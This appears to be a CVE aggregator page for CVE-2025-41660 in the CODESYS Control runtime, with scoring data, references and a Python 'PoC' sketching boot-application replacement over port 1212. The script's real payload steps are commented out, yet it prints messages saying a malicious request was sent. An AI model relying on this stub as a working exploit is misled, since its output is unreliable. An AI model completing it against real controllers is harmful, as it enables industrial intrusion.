CVE-2025-41660

Description

A low-privileged remote attacker may be able to replace the boot application of the CODESYS Control runtime system, enabling unauthorized code execution.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CODESYS Control runtime system (具体受影响版本请参考VDE-2026-011)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-41660 PoC Concept - CODESYS Control Boot Application Replacement
This is a conceptual demonstration. Actual exploitation requires specific protocol handling.
"""
import socket

TARGET_IP = "192.168.1.10"
TARGET_PORT = 1212  # Default CODESYS port
MALICIOUS_FILE_PATH = "malicious_boot_app.bin"

def send_exploit():
    print(f"[*] Attempting to connect to {TARGET_IP}:{TARGET_PORT}...")
    try:
        # 1. Establish TCP connection to CODESYS Control
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((TARGET_IP, TARGET_PORT))
        print("[+] Connection established.")

        # 2. Authenticate with low-privilege credentials (Required per PR:L)
        # auth_payload = build_login_packet("low_priv_user", "password")
        # sock.send(auth_payload)
        print("[*] Authenticating with low-privilege user...")

        # 3. Send request to replace boot application
        # Vulnerability lies in the lack of checks here
        # exploit_payload = build_file_replace_packet("boot_app", MALICIOUS_FILE_PATH)
        # sock.send(exploit_payload)
        print("[+] Sending malicious boot application replacement request...")

        # 4. Trigger execution (usually requires reboot or service restart)
        print("[*] Exploit sent. Wait for device reboot to trigger RCE.")
        sock.close()

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41660
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41660
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41660/
[4] VulDB https://vuldb.com/cve/CVE-2025-41660
[5] https://certvde.com/de/advisories/VDE-2026-011

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41660", "sourceIdentifier": "[email protected]", "published": "2026-03-24T08:16:00.230", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A low-privileged remote attacker may be able to replace the boot application of the CODESYS Control runtime system, enabling unauthorized code execution."}, {"lang": "es", "value": "Un atacante remoto de bajo privilegio podría reemplazar la aplicación de arranque del sistema de tiempo de ejecución de CODESYS Control, permitiendo la ejecución de código no autorizado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-669"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-011", "source": "[email protected]"}]}}